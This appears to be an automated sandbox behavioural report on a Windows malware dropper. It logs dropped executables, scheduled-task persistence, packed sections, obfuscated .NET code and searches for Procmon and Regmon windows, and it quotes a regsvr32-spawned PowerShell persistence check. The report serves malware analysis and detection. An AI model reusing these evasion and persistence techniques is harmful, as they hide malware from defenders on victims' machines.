                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpWindow found: window name: TMainForm
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Skinny Orange_is1
                              Source: Mc3FDUMnVz.exeStatic file information: File size 2128896 > 1048576
                              Source: Mc3FDUMnVz.exeStatic PE information: Raw size of shlcppqz is bigger than: 0x100000 < 0x19bc00
                              Source: Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: Fe36XBk.exe, 0000000A.00000003.1910049525.00000000047FF000.00000004.00001000.00020000.00000000.sdmp, Fe36XBk.exe, 0000000A.00000002.1939471924.0000000000410000.00000040.00000001.01000000.00000009.sdmp
                              Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: Fe36XBk.exe, 0000000A.00000002.1948214053.000000000719E000.00000004.00000020.00020000.00000000.sdmp, Fe36XBk.exe, 0000000A.00000002.1943694439.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: Purpose.pdb source: Ryu8yUx.exe, 0000000C.00000002.2307708162.00000000045B9000.00000004.00000800.00020000.00000000.sdmp, Ryu8yUx.exe, 0000000C.00000000.2135542163.0000000000FF2000.00000002.00000001.01000000.0000000C.sdmp, Ryu8yUx[1].exe.7.dr
                              Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: Fe36XBk.exe, 0000000A.00000002.1945694589.0000000005066000.00000004.00000020.00020000.00000000.sdmp, Fe36XBk.exe, 0000000A.00000002.1948214053.000000000719E000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: Fe36XBk.exe, 0000000A.00000002.1948214053.000000000719E000.00000004.00000020.00020000.00000000.sdmp, Fe36XBk.exe, 0000000A.00000002.1943694439.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: Fe36XBk.exe, 0000000A.00000002.1945694589.0000000005066000.00000004.00000020.00020000.00000000.sdmp, Fe36XBk.exe, 0000000A.00000002.1948214053.000000000719E000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: Stamp_Setup.tmp, 00000018.00000003.2651445491.00000000021F2000.00000004.00001000.00020000.00000000.sdmp, Stamp_Setup.tmp, 00000018.00000003.2648285782.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, Stamp_Setup.tmp, 0000001A.00000003.2661533392.0000000002180000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.26.dr, _isdecmp.dll.24.dr

                              Data Obfuscation

                              barindex
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeUnpacked PE file: 0.2.Mc3FDUMnVz.exe.940000.0.unpack :EW;.rsrc:W;.idata :W; :EW;shlcppqz:EW;uglmbbpk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;shlcppqz:EW;uglmbbpk:EW;.taggant:EW;
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 2.2.skotes.exe.120000.0.unpack :EW;.rsrc:W;.idata :W; :EW;shlcppqz:EW;uglmbbpk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;shlcppqz:EW;uglmbbpk:EW;.taggant:EW;
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 3.2.skotes.exe.120000.0.unpack :EW;.rsrc:W;.idata :W; :EW;shlcppqz:EW;uglmbbpk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;shlcppqz:EW;uglmbbpk:EW;.taggant:EW;
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeUnpacked PE file: 10.2.Fe36XBk.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;apuhhdvg:EW;pzrtjeve:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;apuhhdvg:EW;pzrtjeve:EW;.taggant:EW;
                              Source: Ryu8yUx[1].exe.7.dr, gBMthepoZSL1ZVKpeA.cs.Net Code: RQsQTTbUYeEtZ5KVMrb(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{RQsQTTbUYeEtZ5KVMrb(typeof(IntPtr).TypeHandle),RQsQTTbUYeEtZ5KVMrb(typeof(Type).TypeHandle)})
                              Source: Ryu8yUx.exe.7.dr, gBMthepoZSL1ZVKpeA.cs.Net Code: RQsQTTbUYeEtZ5KVMrb(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{RQsQTTbUYeEtZ5KVMrb(typeof(IntPtr).TypeHandle),RQsQTTbUYeEtZ5KVMrb(typeof(Type).TypeHandle)})
                              Source: 12.2.Ryu8yUx.exe.45b9550.0.raw.unpack, gBMthepoZSL1ZVKpeA.cs.Net Code: RQsQTTbUYeEtZ5KVMrb(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{RQsQTTbUYeEtZ5KVMrb(typeof(IntPtr).TypeHandle),RQsQTTbUYeEtZ5KVMrb(typeof(Type).TypeHandle)})
                              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
                              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
                              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
                              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
                              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
                              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
                              Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2720, type: MEMORYSTR
                              Source: Ryu8yUx[1].exe.7.drStatic PE information: 0xDA43F2C8 [Mon Jan 14 22:35:52 2086 UTC]
                              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                              Source: Ryu8yUx[1].exe.7.drStatic PE information: real checksum: 0x0 should be: 0x6a36b
                              Source: Stamp_Setup.tmp.25.drStatic PE information: real checksum: 0x0 should be: 0x12974f
                              Source: _setup64.tmp.26.drStatic PE information: real checksum: 0x0 should be: 0x8546
                              Source: Fe36XBk[1].exe.7.drStatic PE information: real checksum: 0x220621 should be: 0x21e123
                              Source: Stamp_Setup.tmp.23.drStatic PE information: real checksum: 0x0 should be: 0x12974f
                              Source: kUHbhqh.exe.7.drStatic PE information: real checksum: 0xd40f1 should be: 0xd8e34
                              Source: kUHbhqh[1].exe.7.drStatic PE information: real checksum: 0xd40f1 should be: 0xd8e34
                              Source: Ryu8yUx.exe.7.drStatic PE information: real checksum: 0x0 should be: 0x6a36b
                              Source: is-6JNF1.tmp.26.drStatic PE information: real checksum: 0x0 should be: 0x127a25
                              Source: _isdecmp.dll.24.drStatic PE information: real checksum: 0x0 should be: 0x5528
                              Source: _isdecmp.dll.26.drStatic PE information: real checksum: 0x0 should be: 0x5528
                              Source: is-DKJ0H.tmp.26.drStatic PE information: real checksum: 0x12c91c should be: 0x134190
                              Source: Fe36XBk.exe.7.drStatic PE information: real checksum: 0x220621 should be: 0x21e123
                              Source: Stamp_Setup.exe.11.drStatic PE information: real checksum: 0x0 should be: 0x16db80
                              Source: skotes.exe.0.drStatic PE information: real checksum: 0x210c5e should be: 0x2169d1
                              Source: Mc3FDUMnVz.exeStatic PE information: real checksum: 0x210c5e should be: 0x2169d1
                              Source: _setup64.tmp.24.drStatic PE information: real checksum: 0x0 should be: 0x8546
                              Source: Mc3FDUMnVz.exeStatic PE information: section name:
                              Source: Mc3FDUMnVz.exeStatic PE information: section name: .idata
                              Source: Mc3FDUMnVz.exeStatic PE information: section name:
                              Source: Mc3FDUMnVz.exeStatic PE information: section name: shlcppqz
                              Source: Mc3FDUMnVz.exeStatic PE information: section name: uglmbbpk
                              Source: Mc3FDUMnVz.exeStatic PE information: section name: .taggant
                              Source: skotes.exe.0.drStatic PE information: section name:
                              Source: skotes.exe.0.drStatic PE information: section name: .idata
                              Source: skotes.exe.0.drStatic PE information: section name:
                              Source: skotes.exe.0.drStatic PE information: section name: shlcppqz
                              Source: skotes.exe.0.drStatic PE information: section name: uglmbbpk
                              Source: skotes.exe.0.drStatic PE information: section name: .taggant
                              Source: kUHbhqh[1].exe.7.drStatic PE information: section name: .xdata
                              Source: kUHbhqh.exe.7.drStatic PE information: section name: .xdata
                              Source: Fe36XBk[1].exe.7.drStatic PE information: section name:
                              Source: Fe36XBk[1].exe.7.drStatic PE information: section name: .idata
                              Source: Fe36XBk[1].exe.7.drStatic PE information: section name:
                              Source: Fe36XBk[1].exe.7.drStatic PE information: section name: apuhhdvg
                              Source: Fe36XBk[1].exe.7.drStatic PE information: section name: pzrtjeve
                              Source: Fe36XBk[1].exe.7.drStatic PE information: section name: .taggant
                              Source: Fe36XBk.exe.7.drStatic PE information: section name:
                              Source: Fe36XBk.exe.7.drStatic PE information: section name: .idata
                              Source: Fe36XBk.exe.7.drStatic PE information: section name:
                              Source: Fe36XBk.exe.7.drStatic PE information: section name: apuhhdvg
                              Source: Fe36XBk.exe.7.drStatic PE information: section name: pzrtjeve
                              Source: Fe36XBk.exe.7.drStatic PE information: section name: .taggant
                              Source: is-DKJ0H.tmp.26.drStatic PE information: section name: .xdata
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_001CAC26 push 1554ABA4h; mov dword ptr [esp], eax3_1_001CAC34
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_001F1670 push edi; mov dword ptr [esp], ebp3_1_001F1718
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_001F1670 push ecx; mov dword ptr [esp], ebx3_1_001F1770
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_001F1670 push ecx; mov dword ptr [esp], 7DA83BF2h3_1_001F17AE
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_0025204A push ecx; mov dword ptr [esp], edi3_1_0025204E
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_0025204A push edx; mov dword ptr [esp], ebx3_1_002520BD
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_0025204A push ecx; mov dword ptr [esp], ebp3_1_002520FF
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_001E6C6F push 1BE56D9Dh; mov dword ptr [esp], edx3_1_001E6CA7
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_001E6C6F push esi; mov dword ptr [esp], edx3_1_001E6D4C
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_001E6C6F push 72F001CDh; mov dword ptr [esp], ebx3_1_001E6D7B
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_001E6C6F push eax; mov dword ptr [esp], 1B42DAD2h3_1_001E6D8D
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_001CB263 push 5F9C092Eh; mov dword ptr [esp], edx3_1_001CB27B
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_0025C294 push ebx; mov dword ptr [esp], eax3_1_0025C388
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_0025C294 push 5A592CDFh; mov dword ptr [esp], ebx3_1_0025C3CD
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_001926D0 push edx; retf 3_1_001926D2
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_002700F7 push ecx; mov dword ptr [esp], edx3_1_0027013C
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_002700F7 push 7D872F38h; mov dword ptr [esp], eax3_1_002701FF
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_002700F7 push esi; mov dword ptr [esp], ebx3_1_0027021E
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_001BF6FD push ecx; mov dword ptr [esp], edi3_1_001BF722
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_001BF6FD push 6082A69Fh; mov dword ptr [esp], ecx3_1_001BF75A
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_001F2D15 push eax; mov dword ptr [esp], edi3_1_001F2D68
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_0018EF04 push ecx; retf 3_1_0018EF05
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_001B7F3B push edx; mov dword ptr [esp], 5FF5C43Ch3_1_001B7FDB
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_001B7F3B push ebx; mov dword ptr [esp], 5A1CF3ABh3_1_001B8111
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_0019874F push 4F732503h; mov dword ptr [esp], ebp3_1_001987AC
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_001FCB8F push edx; mov dword ptr [esp], 37654843h3_1_001FCBD1
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_001FCB8F push 0787C9A0h; mov dword ptr [esp], eax3_1_001FCC21
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_001FCB8F push ebp; mov dword ptr [esp], edi3_1_001FCC77
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_001FCB8F push 2DE71F35h; mov dword ptr [esp], edx3_1_001FCC7F
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_001FCB8F push 1C28A808h; mov dword ptr [esp], esi3_1_001FCCAB
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_0022C99A push 21A7BAD5h; mov dword ptr [esp], edi3_1_0022C9AF
                              Source: Mc3FDUMnVz.exeStatic PE information: section name: entropy: 7.131647028097189
                              Source: Mc3FDUMnVz.exeStatic PE information: section name: shlcppqz entropy: 7.952810524743205
                              Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.131647028097189
                              Source: skotes.exe.0.drStatic PE information: section name: shlcppqz entropy: 7.952810524743205
                              Source: Fe36XBk[1].exe.7.drStatic PE information: section name: entropy: 7.936555243798327
                              Source: Fe36XBk[1].exe.7.drStatic PE information: section name: apuhhdvg entropy: 7.952252453116048
                              Source: Fe36XBk.exe.7.drStatic PE information: section name: entropy: 7.936555243798327
                              Source: Fe36XBk.exe.7.drStatic PE information: section name: apuhhdvg entropy: 7.952252453116048
                              Source: Ryu8yUx[1].exe.7.dr, gBMthepoZSL1ZVKpeA.csHigh entropy of concatenated method names: 'iJ7hGcJiZtrY1vmTXS1', 'l3eRiSJQRS1T675dhDw', 'reTlcDMFua', 'BxhRGVJ7kheGMf3Py2t', 'gg3ZFVJakBdVFuZCIgG', 'G5c3kgJhorWWcabQiWI', 'Gim47mJIx9UyjsEXoD7', 'ItKq8kJ0OyIS0T9lLUQ', 'N6HgC6J6Gp0JEvuuieG', 'g4UifPJHxIeKxNQ4Axj'
                              Source: Ryu8yUx.exe.7.dr, gBMthepoZSL1ZVKpeA.csHigh entropy of concatenated method names: 'iJ7hGcJiZtrY1vmTXS1', 'l3eRiSJQRS1T675dhDw', 'reTlcDMFua', 'BxhRGVJ7kheGMf3Py2t', 'gg3ZFVJakBdVFuZCIgG', 'G5c3kgJhorWWcabQiWI', 'Gim47mJIx9UyjsEXoD7', 'ItKq8kJ0OyIS0T9lLUQ', 'N6HgC6J6Gp0JEvuuieG', 'g4UifPJHxIeKxNQ4Axj'
                              Source: 12.2.Ryu8yUx.exe.45b9550.0.raw.unpack, gBMthepoZSL1ZVKpeA.csHigh entropy of concatenated method names: 'iJ7hGcJiZtrY1vmTXS1', 'l3eRiSJQRS1T675dhDw', 'reTlcDMFua', 'BxhRGVJ7kheGMf3Py2t', 'gg3ZFVJakBdVFuZCIgG', 'G5c3kgJhorWWcabQiWI', 'Gim47mJIx9UyjsEXoD7', 'ItKq8kJ0OyIS0T9lLUQ', 'N6HgC6J6Gp0JEvuuieG', 'g4UifPJHxIeKxNQ4Axj'
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\kUHbhqh[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpFile created: C:\Users\user\AppData\Local\Temp\is-MEEGL.tmp\_isetup\_isdecmp.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\Ryu8yUx[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpFile created: C:\Users\user\AppData\Local\is-6JNF1.tmpJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpFile created: C:\Users\user\AppData\Roaming\9mpr_8.ocx (copy)Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpFile created: C:\Users\user\AppData\Local\Temp\is-MEEGL.tmp\_isetup\_shfoldr.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Fe36XBk[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeFile created: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpFile created: C:\Users\user\AppData\Roaming\is-DKJ0H.tmpJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpFile created: C:\Users\user\AppData\Local\Temp\is-2HFGI.tmp\_isetup\_shfoldr.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeFile created: C:\Users\user\AppData\Roaming\Stamp_Setup.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpFile created: C:\Users\user\AppData\Local\Temp\is-MEEGL.tmp\_isetup\_setup64.tmpJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpFile created: C:\Users\user\AppData\Local\Temp\is-2HFGI.tmp\_isetup\_setup64.tmpJump to dropped file
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                              Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeFile created: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpFile created: C:\Users\user\AppData\Local\Temp\is-2HFGI.tmp\_isetup\_isdecmp.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpFile created: C:\Users\user\AppData\Local\unins000.exe (copy)Jump to dropped file

                              Boot Survival

                              barindex
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeWindow searched: window name: RegmonClassJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeWindow searched: window name: RegmonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
